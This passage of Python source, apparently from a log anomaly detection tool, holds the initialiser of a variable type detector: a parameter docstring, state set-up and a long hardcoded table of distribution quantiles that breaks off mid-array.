learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of occurring events. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are @param used_gof_test states the used test statistic for the continuous data type. Implemented are the 'KS' and 'CM' tests. @param gof_alpha significance niveau for p-value for the distribution test of the initialization. Recomended values are the implemented values of crit_val_ini_ks and crit_val_upd_ks or _cm. @param s_gof_alpha significance niveau for p-value for the sliding KS-test in the update step. Recommended values are the implemented values of crit_val_upd_ks. @param s_gof_bt_alpha significance niveau for the binomial test of the test results of the s_gof-test. @param d_alpha significance niveau for the binomialtest of the single discrete variables. If used_multinomial_test == 'Approx' then faster runtime for values in the p list of bt_min_succ_data. @param d_bt_alpha significance niveau for the binomialtest of the test results of the discrete tests. @param div_thres threshold for diversity of the values of a variable (the higher the more values have to be distinct to be considered to be continuous distributed). @param sim_thres threshold for similarity of the values of a variable (the higher the more values have to be common to be considered discrete). @param indicator_thres threshold for the variable indicators to be used in the event indicator. @param num_init number of lines processed before detecting the variable types. 
Recommended values are the implemented values of crit_val_ini_ks and crit_val_upd_ks or _cm. @param num_update number of values for which the variable type is updated. If used_multinomial_test == 'Approx' then faster runtime for values in the p list of bt_min_succ_data. @param num_update_unq number of values for which the values of type unq is unique (the last num_update + num_update_unq values are unique). @param num_s_gof_values number of values which are tested in the s_gof-test. The value has to be <= num_init, >= num_update. Recommended values are the implemented values of crit_val_upd_ks. @param num_s_gof_bt number of tested s_gof-Tests for the binomialtest of the testresults of the s_gof tests. @param num_d_bt number of tested discrete samples for the binomial test of the test results of the discrete tests. @param num_pause_discrete number of paused updates, before the discrete var type is adapted. @param num_pause_others number of paused update runs, before trying to find a new var_type. @param test_gof_int states if integer number should be tested for the continuous variable type. @param num_stop_update stops updating the found variable types after num_stop_update processed lines. If False the updating of lines will not be stopped. @param silence_output_without_confidence silences the all messages without a confidence-entry. @param silence_output_except_indicator silences the all messages which are not related with the calculated indicator. @param num_var_type_hist_ref states how long the reference for the var_type_hist_ref is. The reference is used in the evaluation. @param num_update_var_type_hist_ref number of update steps before the var_type_hist_ref is being updated. @param num_var_type_considered_ind this attribute states how many variable types of the history are used as the recent history in the calculation of the indicator. False if no output of the indicator should be generated. 
@param num_stat_stop_update number of static values of a variable, to stop tracking the variable type and read in the ETD. False if not wanted. @param num_updates_until_var_reduction number of update steps until the variables are tested if they are suitable for an indicator. If not suitable, they are removed from the tracking of ETD (reduce checked variables). Equals 0 if disabled. @param var_reduction_thres threshold for the reduction of variable types. The most likely none others var type must have a higher relative appearance for the variable to be further checked. @param num_skipped_ind_for_weights number of the skipped indicators for the calculation of the indicator weights. @param num_ind_for_weights number of indicators used in the calculation of the indicator weights. @param used_multinomial_test states the used multinomial test. Allowed values are 'MT', 'Approx' and 'Chi', where 'MT' means original MT, 'Approx' is the approximation with single BTs and 'Chi' is the Chi-square test. @param use_empiric_distr states if empiric distributions of the variables should be used if no continuous distribution is detected. @param used_range_test states the used method of range estimation. Allowed values are 'MeanSD', 'EmpiricQuantiles' and 'MinMax'. Where 'MeanSD' means the estimation through mean and standard deviation, 'EmpiricQuantiles' estimation through the empirical quantiles and 'MinMax' the estimation through minimum and maximum. @param range_alpha significance niveau for the range variable type. @param range_threshold maximal proportional deviation from the range before the variable type is rejected. @param num_reinit_range number of update steps until the range variable type is reinitialized. Set to zero if not desired. @param range_limits_factor factor for the limits of the range variable type. @param dw_alpha significance niveau of the durbin watson test to test serial correlation. 
If the test fails the type range is assigned to the variable instead of continuous. @param save_statistics used to track the indicators and changed variable types. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["ignore_list", "constraint_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, used_gof_test=used_gof_test, gof_alpha=gof_alpha, s_gof_alpha=s_gof_alpha, s_gof_bt_alpha=s_gof_bt_alpha, d_alpha=d_alpha, d_bt_alpha=d_bt_alpha, div_thres=div_thres, sim_thres=sim_thres, indicator_thres=indicator_thres, num_init=num_init, num_update=num_update, num_update_unq=num_update_unq, num_s_gof_values=num_s_gof_values, num_s_gof_bt=num_s_gof_bt, num_d_bt=num_d_bt, num_pause_discrete=num_pause_discrete, num_pause_others=num_pause_others, test_gof_int=test_gof_int, num_stop_update=num_stop_update, silence_output_without_confidence=silence_output_without_confidence, silence_output_except_indicator=silence_output_except_indicator, num_var_type_hist_ref=num_var_type_hist_ref, num_update_var_type_hist_ref=num_update_var_type_hist_ref, num_var_type_considered_ind=num_var_type_considered_ind, num_stat_stop_update=num_stat_stop_update, num_updates_until_var_reduction=num_updates_until_var_reduction, var_reduction_thres=var_reduction_thres, num_skipped_ind_for_weights=num_skipped_ind_for_weights, num_ind_for_weights=num_ind_for_weights, used_multinomial_test=used_multinomial_test, use_empiric_distr=use_empiric_distr, used_range_test=used_range_test, range_alpha=range_alpha, range_threshold=range_threshold, num_reinit_range=num_reinit_range, range_limits_factor=range_limits_factor, dw_alpha=dw_alpha, 
save_statistics=save_statistics, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # Initialization of variables, which are no input parameters # Saves the minimal number of successes for the BT for the s_gof-test self.s_gof_bt_min_success = self.bt_min_successes(self.num_s_gof_bt, 1 - self.s_gof_alpha, self.s_gof_bt_alpha) # Saves the minimal number of successes for the BT for discrete values self.d_bt_min_success = self.bt_min_successes(self.num_d_bt, 1 - self.d_alpha, self.d_bt_alpha) # Number of eventTypes self.num_events = 0 # Add the variable_type_detector to the list of the modules, which use the event_type_detector. self.event_type_detector.add_following_modules(self) # List of the numbers of variables of the eventTypes self.length = [] # Used to keep track of the indices of the variables if the target_path_list is not empty self.variable_path_num = [] # List of the found vartypes self.var_type = [] # Stores the alternative distribution types of continuous variables self.alternative_distribution_types = [] # Stores the values the betam and special distributions. The values are needed in the s_gof test self.distr_val = [] # List of the successes of the binomial test for the rejection in the s_gof or variables of discrete type self.bt_results = [] # List of the history of variable types of the single variables. The lists to the variables take the form # [others, static, [discrete, number of appended steps], asc, desc, unique, range, ev of continuous distributions] self.var_type_history_list = [] # Reference of a var_type_history_list. Used in the calculation of the indicator. 
self.var_type_history_list_reference = [] # Order of the var_type_history_list [others, static, [discrete, number of appended steps], asc, desc, unique, range, # ev of continuous distributions] self.var_type_history_list_order = ['others', 'stat', 'd', 'asc', 'desc', 'unq', 'range', 'cont'] # List of the distributions for which the s_gof test is implemented self.distr_list = ['nor', 'uni', 'spec', 'beta', 'betam', 'emp'] # List of the numbers of log lines of this eventType, when an indicator failed self.failed_indicators = [] # Stores the standardised values of all tested distributions for better performance. The list is hardcoded below self.quantiles = {} # Stores the number of minimal successes for the BT for selected sample-size and probabilities. self.bt_min_succ_data = {} self.log_success = 0 self.log_total = 0 self.log_new_learned = 0 self.log_new_learned_values = [] self.log_updated = 0 # Initialize lists used for the tracking of the indicator if self.save_statistics: self.statistics_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, 'statistics') # List of the numbers of total parsed log lines, when an indicator failed. Only used for the statistics self.failed_indicators_total = [] # List of the confidences of the indicators self.failed_indicators_values = [] # List of the paths of the indicators self.failed_indicators_paths = [] # List of the numbers of total parsed log lines, when a variable changed its type. Only used for the statistics self.changed_var_types = [] # Stores the standardised values of all tested distributions for better performance. 
self.quantiles = { 'spec': np.array([-1.8273443302401238,-1.7593797798616286,-1.709951015949996,-1.6790580385052258,-1.6543436565494094,-1.6296292745935932,-1.6110934881267307,-1.5925577016598689,-1.5740219151930066,-1.561664724215098,-1.5493075332371908,-1.5369503422592823,-1.5245931512813744,-1.512235960303466,-1.5060573648145121,-1.4937001738366036,-1.4875215783476496,-1.4751643873697418,-1.4689857918807874,-1.4628071963918334,-1.4566286009028795,-1.444271409924971,-1.438092814436017,-1.431914218947063,-1.4257356234581091,-1.4195570279691547,-1.4133784324802008,-1.4071998369912468,-1.401021241502293,-1.3948426460133383,-1.3886640505243844,-1.3824854550354304,-1.3763068595464765,-1.373217561801999,-1.370128264057522,-1.363949668568568,-1.357771073079614,-1.35159247759066,-1.3485031798461826,-1.3454138821017056,-1.3392352866127517,-1.3330566911237978,-1.3299673933793208,-1.3268780956348438,-1.3206995001458892,-1.3176102024014122,-1.3145209046569353,-1.3083423091679813,-1.3052530114235044,-1.3021637136790274,-1.295985118190073,-1.292895820445596,-1.289806522701119,-1.2836279272121651,-1.2805386294676881,-1.2774493317232112,-1.2743600339787335,-1.2712707362342566,-1.2650921407453026,-1.2620028430008257,-1.2589135452563487,-1.2558242475118717,-1.2527349497673947,-1.2496456520229173,-1.2465563542784404,-1.2434670565339634,-1.2403777587894864,-1.2341991633005323,-1.2311098655560553,-1.2280205678115783,-1.2249312700671011,-1.2218419723226241,-1.2187526745781472,-1.2156633768336702,-1.2125740790891932,-1.209484781344716,-1.206395483600239,-1.203306185855762,-1.2002168881112847,-1.1971275903668077,-1.1940382926223307,-1.1909489948778538,-1.1878596971333768,-1.1847703993888996,-1.1827108675592481,-1.1806513357295971,-1.1785918038999457,-1.175502506155469,-1.172413208410992,-1.169323910666515,-1.1662346129220378,-1.1631453151775606,-1.1600560174330836,-1.1569667196886066,-1.1538774219441297,-1.1518178901144782,-1.1497583582848272,-1.1476988264551757,-1.1446095287106988,-1.14
15202309662216,-1.1384309332217442,-1.1353416354772672,-1.133282103647616,-1.1312225718179647,-1.1291630399883132,-1.1260737422438363,-1.1229844444993593,-1.120924912669708,-1.1188653808400566,-1.1168058490104051,-1.113716551265928,-1.110627253521451,-1.107537955776974,-1.104448658032497,-1.1023891262028456,-1.1003295943731946,-1.098270062543543,-1.0951807647990661,-1.092091467054589,-1.0900319352249375,-1.087972403395286,-1.0859128715656345,-1.0828235738211576,-1.0797342760766806,-1.0776747442470294,-1.0756152124173781,-1.0735556805877267,-1.0704663828432497,-1.0673770850987725,-1.065317553269121,-1.0632580214394698,-1.0611984896098183,-1.0591389577801669,-1.0570794259505158,-1.0550198941208644,-1.0519305963763874,-1.0488412986319104,-1.046781766802259,-1.0447222349726075,-1.0426627031429563,-1.0395734053984789,-1.036484107654002,-1.0344245758243507,-1.0323650439946994,-1.030305512165048,-1.0282459803353967,-1.0261864485057455,-1.024126916676094,-1.021037618931617,-1.0179483211871398,-1.0158887893574884,-1.0138292575278371,-1.0117697256981857,-1.0097101938685342,-1.0076506620388832,-1.0055911302092317,-1.0025018324647548,-0.9994125347202778,-0.9973530028906263,-0.995293471060975,-0.9932339392313235,-0.9911744074016722,-0.9891148755720207,-0.9870553437423694,-0.9839660459978924,-0.9808767482534154,-0.978817216423764,-0.9767576845941128,-0.9746981527644615,-0.97263862093481,-0.9705790891051587,-0.9685195572755072,-0.96543025953103,-0.962340961786553,-0.9602814299569016,-0.9582218981272504,-0.9561623662975991,-0.9541028344679476,-0.9520433026382965,-0.9499837708086452,-0.9468944730641682,-0.9438051753196909,-0.9417456434900395,-0.9396861116603881,-0.9376265798307367,-0.9355670480010853,-0.9335075161714341,-0.9314479843417828,-0.9283586865973058,-0.9252693888528288,-0.9232098570231774,-0.921150325193526,-0.9190907933638746,-0.9170312615342232,-0.9149717297045717,-0.9129121978749204,-0.9098229001304434,-0.9067336023859665,-0.904674070556315,-0.9026145387266639,-0.900555
0068970124,-0.898495475067361,-0.8964359432377096,-0.8943764114080582,-0.891287113663581,-0.888197815919104,-0.8861382840894528,-0.8840787522598015,-0.8820192204301504,-0.878929922685673,-0.8758406249411961,-0.8737810931115447,-0.8717215612818936,-0.8696620294522421,-0.8676024976225908,-0.8655429657929393,-0.863483433963288,-0.860394136218811,-0.857304838474334,-0.8552453066446826,-0.8531857748150312,-0.8511262429853798,-0.8490667111557284,-0.8470071793260773,-0.8449476474964258,-0.8418583497519488,-0.8387690520074716,-0.8367095201778202,-0.8346499883481691,-0.8325904565185177,-0.8305309246888662,-0.8284713928592149,-0.8264118610295634,-0.8233225632850865,-0.8202332655406095,-0.8181737337109581,-0.8161142018813067,-0.8140546700516553,-0.8119951382220039,-0.8099356063923527,-0.8078760745627014,-0.8047867768182241,-0.8016974790737471,-0.7996379472440958,-0.7975784154144446,-0.7955188835847932,-0.7934593517551418,-0.7913998199254904,-0.789340288095839,-0.786250990351362,-0.7831616926068851,-0.7811021607772336,-0.7790426289475822,-0.7769830971179308,-0.7749235652882794,-0.7728640334586283,-0.7708045016289768,-0.7677152038844999,-0.7646259061400227,-0.7625663743103712,-0.7605068424807201,-0.7584473106510687,-0.7553580129065914,-0.7522687151621145,-0.7502091833324631,-0.748149651502812,-0.7460901196731605,-0.7440305878435092,-0.7419710560138577,-0.7399115241842064,-0.7368222264397294,-0.7337329286952524,-0.731673396865601,-0.7296138650359496,-0.7275543332062981,-0.7254948013766468,-0.7234352695469957,-0.7213757377173442,-0.7182864399728672,-0.71519714222839,-0.7131376103987386,-0.7110780785690874,-0.7090185467394361,-0.7069590149097846,-0.7048994830801333,-0.7028399512504818,-0.6997506535060048,-0.6966613557615279,-0.6946018239318765,-0.6925422921022254,-0.6904827602725739,-0.687393462528097,-0.6843041647836198,-0.6822446329539683,-0.6801851011243172,-0.6781255692946658,-0.6760660374650144,-0.674006505635363,-0.6719469738057116,-0.6688576760612346,-0.6657683783167576,-0.6
637088464871063,-0.6616493146574548,-0.6595897828278035,-0.6565004850833265,-0.6534111873388495,-0.651351655509198,-0.6492921236795467,-0.6472325918498952,-0.645173060020244,-0.6431135281905925,-0.6410539963609413,-0.6379646986164642,-0.6348754008719871,-0.6328158690423358,-0.6307563372126844,-0.6286968053830332,-0.625607507638556,-0.6225182098940789,-0.6204586780644277,-0.6183991462347762,-0.616339614405125,-0.6142800825754736,-0.6122205507458222,-0.6101610189161708,-0.6070717211716938,-0.6039824234272169,-0.6019228915975654,-0.599863359767914,-0.5978038279382626,-0.5947145301937856,-0.5916252324493086,-0.5895657006196572,-0.5875061687900058,-0.5854466369603544,-0.5833871051307031,-0.5813275733010518,-0.5792680414714004,-0.5761787437269233,-0.5730894459824463,-0.571029914152795,-0.5689703823231436,-0.5669108504934923,-0.5638215527490152,-0.560732255004538,-0.5586727231748868,-0.5566131913452355,-0.5545536595155841,-0.551464361771107,-0.5483750640266299,-0.5463155321969787,-0.5442560003673272,-0.542196468537676,-0.5401369367080245,-0.5380774048783732,-0.5360178730487217,-0.5329285753042448,-0.5298392775597678,-0.5277797457301164,-0.525720213900465,-0.5236606820708136,-0.5205713843263367,-0.5174820865818597,-0.5154225547522082,-0.5133630229225569,-0.5113034910929054,-0.5082141933484284,-0.5051248956039515,-0.5030653637743001,-0.5010058319446486,-0.4989463001149973,-0.49585700237052033,-0.49276770462604347,-0.49070817279639206,-0.4886486409667408,-0.4865891091370894,-0.48349981139261244,-0.4804105136481353,-0.4783509818184839,-0.47629144998883266,-0.47423191815918125,-0.47217238632952985,-0.47011285449987855,-0.46805332267022715,-0.46496402492575006,-0.4618747271812731,-0.4598151953516217,-0.4577556635219704,-0.455696131692319,-0.4526068339478419,-0.44951753620336493,-0.4474580043737135,-0.44539847254406223,-0.4433389407144108,-0.4402496429699337,-0.4371603452254567,-0.4351008133958053,-0.43304128156615407,-0.43098174973650266,-0.4278924519920255,-0.42480315424754855,
-0.42274362241789715,-0.4206840905882459,-0.4186245587585945,-0.41553526101411736,-0.4124459632696404,-0.410386431439989,-0.40832689961033775,-0.40626736778068634,-0.4031780700362092,-0.40008877229173223,-0.3980292404620808,-0.3959697086324296,-0.3939101768027782,-0.39082087905830104,-0.38773158131382407,-0.38567204948417266,-0.3836125176545214,-0.38155298582487,-0.3784636880803929,-0.3753743903359159,-0.37228509259143894,-0.36919579484696186,-0.36713626301731045,-0.36507673118765915,-0.36301719935800775,-0.3599279016135308,-0.3568386038690537,-0.3547790720394023,-0.352719540209751,-0.3506600083800996,-0.3475707106356226,-0.34448141289114553,-0.3424218810614941,-0.34036234923184283,-0.3383028174021914,-0.33521351965771445,-0.33212422191323737,-0.33006469008358597,-0.32800515825393467,-0.32594562642428326,-0.3228563286798063,-0.3197670309353292,-0.3177074991056778,-0.3156479672760265,-0.3135884354463751,-0.31049913770189813,-0.30740983995742105,-0.3043205422129441,-0.3012312444684671,-0.2991717126388157,-0.2971121808091644,-0.295052648979513,-0.29196335123503603,-0.2888740534905589,-0.2868145216609075,-0.28475498983125624,-0.28269545800160484,-0.27960616025712787,-0.27651686251265073,-0.27342756476817365,-0.2703382670236967,-0.26827873519404527,-0.266219203364394,-0.26415967153474257,-0.2610703737902655,-0.2579810760457885,-0.2559215442161371,-0.2538620123864858,-0.2518024805568344,-0.24871318281235733,-0.24562388506788035,-0.24253458732340338,-0.23944528957892627,-0.23738575774927487,-0.2353262259196236,-0.2332666940899722,-0.23017739634549522,-0.2270880986010181,-0.223998800856541,-0.22090950311206403,-0.21884997128241263,-0.21679043945276136,-0.21473090762310995,-0.21164160987863284,-0.20855231213415587,-0.20649278030450446,-0.20443324847485317,-0.20237371664520176,-0.19928441890072465,-0.19619512115624768,-0.1931058234117707,-0.1900165256672936,-0.1879569938376422,-0.18589746200799093,-0.18383793017833952,-0.18074863243386255,-0.17765933468938544,-0.1745700369449
0833,-0.17148073920043136,-0.16942120737077995,-0.16736167554112868,-0.16530214371147728,-0.1622128459670003,-0.15912354822252334,-0.15603425047804623,-0.15294495273356926,-0.15088542090391785,-0.14882588907426658,-0.14676635724461518,-0.14367705950013807,-0.1405877617556611,-0.13749846401118412,-0.13440916626670701,-0.1313198685222299,-0.12823057077775293,-0.12617103894810153,-0.12411150711845026,-0.12205197528879885,-0.11896267754432174,-0.11587337979984477,-0.1127840820553678,-0.10969478431089069,-0.10763525248123929,-0.10557572065158802,-0.10351618882193661,-0.10042689107745964,-0.09733759333298253,-0.09424829558850542,-0.09115899784402844,-0.08806970009955147,-0.08498040235507436,-0.08292087052542295,-0.08086133869577168,-0.07880180686612027,-0.0757125091216433,-0.0726232113771662,-0.06953391363268908,-0.06644461588821211,-0.06335531814373514,-0.06026602039925803,-0.058206488569606626,-0.05614695673995536,-0.05408742491030395,-0.05099812716582691,-0.04790882942134987,-0.04481953167687283,-0.04173023393239579,-0.03864093618791875,-0.03555163844344171,-0.03246234069896467,-0.029373042954487626,-0.02731351112483629,-0.025253979295184883,-0.023194447465533546,-0.020105149721056502,-0.01701585197657946,-0.013926554232102421,-0.010837256487625381,-0.00774795874314834,-0.0046586609986712995,-0.0015693632541942586,0.0015199344902827824,0.00357946631993412,0.005638998149585526,0.007698529979236864,0.010787827723713905,0.013877125468190945,0.016966423212667985,0.020055720957145026,0.02314501870162207,0.02623431644609911,0.02932361419057615,0.03241291193505319,0.03550220967953016,0.03859150742400713,0.04168080516848417,0.04477010291296122,0.04682963474261256,0.04888916657226396,0.0509486984019153,0.05403799614639234,0.05712729389086938,0.06021659163534642,0.06330588937982347,0.06639518712430051,0.06948448486877755,0.07257378261325459,0.07566308035773163,0.07875237810220867,0.08184167584668571,0.08493097359116275,0.08802027133563979,0.09110956908011683,0.09419886682459387,
0.09625839865424521,0.09831793048389662,0.10037746231354795,0.10346676005802499,0.10655605780250203,0.10964535554697907,0.11273465329145611,0.11582395103593315,0.1189132487804102,0.12200254652488723,0.1250918442693643,0.12818114201384126,0.13127043975831829,0.13435973750279534,0.13744903524727237,0.14053833299174942,0.14362763073622645,0.1467169284807035,0.14980622622518053,0.15289552396965758,0.1559848217141346,0.15907411945861166,0.1621634172030887,0.16525271494756574,0.16834201269204277,0.17143131043651982,0.17452060818099685,0.1776099059254739,0.18069920366995093,0.18378850141442798,0.18687779915890504,0.18996709690338207,0.19305639464785912,0.19614569239233615,0.1992349901368132,0.20232428788129023,0.2054135856257672,0.20850288337024425,0.21159218111472128,0.21468147885919833,0.21777077660367536,0.2208600743481524,0.22394937209262944,0.2270386698371065,0.23012796758158352,0.23321726532606057,0.2363065630705376,0.23939586081501465,0.24248515855949168,0.24557445630396874,0.24866375404844576,0.2517530517929228,0.25484234953739987,0.2579316472818769,0.2610209450263539,0.264110242770831,0.26719954051530803,0.27028883825978506,0.2733781360042621,0.27646743374873917,0.2795567314932162,0.2826460292376932,0.28573532698217025,0.29191392247112435,0.2950032202156014,0.2980925179600784,0.30118181570455543,0.30427111344903246,0.3073604111935095,0.3104497089379865,0.31353900668246354,0.3166283044269406,0.31971760217141765,0.3228068999158947,0.3258961976603717,0.3289854954048488,0.3320747931493258,0.33516409089380284,0.34134268638275694,0.34443198412723397,0.34752128187171094,0.3506105796161881,0.35369987736066505,0.35678917510514213,0.3598784728496191,0.36296777059409624,0.3660570683385732,0.3691463660830503,0.37223566382752726,0.37841425931648137,0.3815035570609584,0.3845928548054354,0.38768215254991245,0.39077145029438953,0.39386074803886656,0.3969500457833436,0.4000393435278206,0.4031286412722977,0.40930723676125175,0.4123965345057288,0.41548583225020586,0.4185751299946829
,0.4216644277391599,0.424753725483637,0.427843023228114,0.43402161871706807,0.43711091646154504,0.4402002142060222,0.44328951195049915,0.44637880969497623,0.4494681074394532,0.45255740518393034,0.45873600067288434,0.46182529841736136,0.46491459616183844,0.46800389390631547,0.4710931916507925,0.4741824893952695,0.4772717871397466,0.48345038262870066,0.4865396803731777,0.48962897811765477,0.4927182758621318,0.4958075736066088,0.5019861690955629,0.50507546684004,0.508164764584517,0.5112540623289941,0.514343360073471,0.5205219555624251,0.5236112533069022,0.5267005510513791,0.5297898487958562,0.5328791465403333,0.5390577420292874,0.5421470397737643,0.5452363375182414,0.5483256352627185,0.5514149330071955,0.5575935284961496,0.5606828262406266,0.5637721239851037,0.5668614217295807,0.5699507194740577,0.5761293149630118,0.5792186127074889,0.582307910451966,0.58848650594092,0.5915758036853971,0.594665101429874,0.5977543991743511,0.6008436969188281,0.6070222924077823,0.6101115901522592,0.6132008878967362,0.6193794833856904,0.6224687811301673,0.6255580788746444,0.6317366743635986,0.6348259721080756,0.6379152698525525,0.6440938653415067,0.6471831630859837,0.6502724608304606,0.6533617585749378,0.6564510563194148,0.6626296518083689,0.6657189495528459,0.6688082472973229,0.674986842786277,0.6780761405307542,0.6811654382752311,0.6873440337641852,0.6904333315086623,0.6935226292531392,0.6997012247420933,0.7058798202310475,0.7089691179755245,0.7120584157200015,0.7182370112089556,0.7213263089534326,0.7244156066979096,0.7305942021868638,0.7336834999313409,0.7367727976758178,0.7429513931647719,0.746040690909249,0.7491299886537259,0.7553085841426801,0.7614871796316341,0.7645764773761111,0.7676657751205882,0.7738443706095423,0.7769336683540192,0.7800229660984964,0.7862015615874505,0.7923801570764044,0.7954694548208815,0.7985587525653586,0.8047373480543126,0.8078266457987897,0.8109159435432668,0.8170945390322207,0.823273134521175,0.826362432265652,0.829451730010129,0.835630325499083,0.8418089
209880371,0.844898218732514,0.8479875164769911,0.8541661119659453,0.8603447074548993,0.8634340051993764,0.8665233029438534,0.8727018984328074,0.8788804939217616,0.8850590894107156,0.8881483871551927,0.8912376848996697,0.8974162803886238,0.9035948758775779,0.9066841736220549,0.909773471366532,0.915952066855486,0.9221306623444401,0.9283092578333942,0.9313985555778712,0.9344878533223482,0.9406664488113023,0.9468450443002563,0.9530236397892106,0.9561129375336875,0.9592022352781645,0.9653808307671187,0.9715594262560726,0.9777380217450269,0.9839166172339808,0.9870059149784579,0.990095212722935,0.9962738082118889,1.002452403700843,1.008630999189797,1.0148095946787512,1.0209881901677054,1.0271667856566593,1.0302560834011365,1.0333453811456135,1.0395239766345676,1.0457025721235216,1.0518811676124757,1.0580597631014297,1.0642383585903838,1.070416954079338,1.076595549568292,1.0796848473127691,1.0827741450572461,1.0889527405462003,1.0951313360351542,1.1013099315241082,1.1074885270130623,1.1136671225020165,1.1198457179909704,1.1260243134799246,1.1322029089688785,1.1383815044578327,1.1445600999467869,1.1507386954357408,1.156917290924695,1.1630958864136491,1.169274481902603,1.1754530773915572,1.1816316728805112,1.1878102683694653,1.1939888638584195,1.2001674593473735,1.2063460548363276,1.2125246503252818,1.2187032458142357,1.2248818413031899,1.2310604367921438,1.237239032281098,1.243417627770052,1.249596223259006,1.2557748187479605,1.2619534142369144,1.2681320097258684,1.2743106052148225,1.2804892007037767,1.2866677961927306,1.2990249871706385,1.3052035826595927,1.311382178148547,1.317560773637501,1.323739369126455,1.3299179646154091,1.3360965601043633,1.3484537510822712,1.3546323465712253,1.3608109420601797,1.3669895375491337,1.3731681330380876,1.3793467285270418,1.3917039195049499,1.3978825149939038,1.404061110482858,1.4102397059718124,1.4225968969497202,1.4287754924386744,1.4349540879276284,1.4411326834165825,1.4534898743944904,1.4596684698834448,1.465847065372399,1.47820425635
03068,1.484382851839261,1.4905614473282152,1.502918638306123,1.5090972337950774,1.5152758292840316,1.5276330202619395,1.5338116157508936,1.5461688067288017,1.5523474022177557,1.5647045931956642,1.5708831886846182,1.5832403796625263,1.5894189751514805,1.6017761661293883,1.6079547616183427,1.6203119525962508,1.6264905480852048,1.6388477390631127,1.645026334552067,1.657383525529975,1.6697407165078835,1.6759193119968374,1.6882765029747453,1.6944550984636997,1.7068122894416076,1.7191694804195161,1.731526671397424,1.737705266886378,1.7500624578642865,1.7624196488421944,1.7747768398201027,1.7871340307980106,1.7994912217759191,1.805669817264873,1.8180270082427814,1.8303841992206893,1.8427413901985972,1.8550985811765057,1.8674557721544136,1.879812963132322,1.8983487495991844,1.9107059405770923,1.9230631315550006,1.9354203225329085,1.947777513510817,1.966313299977679,1.9786704909555872,1.991027681933495,2.0095634684003576,2.0219206593782655,2.0404564458451278,2.052813636823036,2.071349423289898,2.0898852097567606,2.102242400734669,2.1207781872015308,2.139313973668393,2.1578497601352553,2.176385546602118,2.19492133306898,2.213457119535842,2.2319929060027044,2.2567072879585206,2.2752430744253833,2.293778860892245,2.3184932428480614,2.3432076248038776,2.3679220067596938,2.3926363887155104,2.4173507706713266,2.442065152627143,2.4729581300719135,2.4976725120277297,2.5285654894725,2.55945846691727,2.590351444362041,2.627423017295765,2.66449459022949,2.701566163163214,2.744816331585892,2.788066500008571,2.8374952639202036,2.8869240278318364,2.942531387232423,3.004317342121964,3.072281892500459,3.1464250383679073,3.2391039707022187,3.344140094014438,3.473890599282474,3.646891272973188]), # skipcq: FLK-E231, FLK-E501 'betam1': 
np.array([0.0,0.00025,0.0005,0.00075,0.001,0.0012000000000000001,0.0014,0.0015999999999999999,0.0018,0.002,0.0022,0.0024000000000000002,0.0026,0.0028,0.003,0.0032,0.0034000000000000002,0.0036,0.0038,0.004,0.0042,0.0044,0.0046,0.0048000000000000004,0.005,0.0052,0.0054,0.0056,0.0058000000000000005,0.006,0.0062,0.0064,0.0066,0.0068000000000000005,0.007,0.0072,0.0074,0.0076,0.0078000000000000005,0.008,0.0082,0.0084,0.0086,0.008799999999999999,0.009,0.00925,0.0095,0.00975,0.01,0.0102,0.0104,0.0106,0.010799999999999999,0.011,0.0112,0.0114,0.0116,0.0118,0.012,0.0122,0.0124,0.0126,0.012799999999999999,0.013,0.0132,0.0134,0.0136,0.0138,0.014,0.01425,0.014499999999999999,0.01475,0.015,0.0152,0.0154,0.0156,0.0158,0.016,0.0162,0.0164,0.0166,0.016800000000000002,0.017,0.01725,0.0175,0.01775,0.018,0.018199999999999997,0.0184,0.0186,0.0188,0.019,0.0192,0.0194,0.0196,0.0198,0.02,0.02025,0.0205,0.02075,0.021,0.0212,0.0214,0.0216,0.0218,0.022,0.02225,0.0225,0.02275,0.023,0.0232,0.0234,0.0236,0.0238,0.024,0.02425,0.0245,0.02475,0.025,0.0252,0.0254,0.0256,0.0258,0.026,0.02625,0.0265,0.02675,0.027,0.0272,0.0274,0.0276,0.027800000000000002,0.028,0.02825,0.0285,0.02875,0.029,0.0292,0.0294,0.0296,0.0298,0.03,0.03025,0.0305,0.03075,0.031,0.0312,0.0314,0.0316,0.0318,0.032,0.03225,0.0325,0.03275,0.033,0.03325,0.0335,0.03375,0.034,0.0342,0.0344,0.034600000000000006,0.034800000000000005,0.035,0.035250000000000004,0.035500000000000004,0.03575,0.036,0.03625,0.0365,0.03675,0.037,0.0372,0.037399999999999996,0.0376,0.0378,0.038,0.03825,0.0385,0.03875,0.039,0.03925,0.0395,0.03975,0.04,0.04025,0.0405,0.04075,0.041,0.04125,0.0415,0.04175,0.042,0.0422,0.0424,0.0426,0.0428,0.043,0.04325,0.0435,0.04375,0.044,0.04425,0.0445,0.04475,0.045,0.04525,0.0455,0.04575,0.046,0.04625,0.0465,0.04675,0.047,0.04725,0.0475,0.04775,0.048,0.0482,0.0484,0.048600000000000004,0.0488,0.049,0.04925,0.0495,0.04975,0.05,0.05025,0.0505,0.050749999999999997,0.051,0.05125,0.0515,0.05175,0.052,0.05225,0.0525,0.05275,0.053,0.05325,0.
